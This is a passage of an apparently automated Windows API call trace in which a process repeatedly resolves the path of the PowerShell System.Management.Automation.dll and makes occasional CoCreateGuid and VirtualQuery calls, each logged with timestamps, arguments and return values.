pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xa9c1468d, Data2=0x2e1f, Data3=0x4ae1, Data4=([0]=0xb0, [1]=0x32, [2]=0x45, [3]=0xb, [4]=0xfe, [5]=0x80, [6]=0xb1, [7]=0xd))) returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.238] GetLastError () returned 0x0 [0152.238] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x62ac6119, Data2=0xb6e1, Data3=0x402d, Data4=([0]=0x84, [1]=0x94, [2]=0x86, [3]=0x1a, [4]=0x9a, [5]=0xd1, [6]=0xe8, [7]=0x51))) returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.239] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.240] GetLastError () returned 0x0 [0152.241] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.241] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.241] GetLastError () returned 0x0 [0152.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.241] GetLastError () returned 0x0 [0152.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.241] GetLastError () returned 0x0 [0152.241] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.241] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.241] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.242] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.242] GetLastError () returned 0x0 [0152.243] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.243] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.243] GetLastError () returned 0x0 [0152.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.244] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.244] VirtualQuery (in: lpAddress=0x23ce20, lpBuffer=0x23de20, dwLength=0x1c | out: lpBuffer=0x23de20*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.244] GetLastError () returned 0x0 [0152.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | 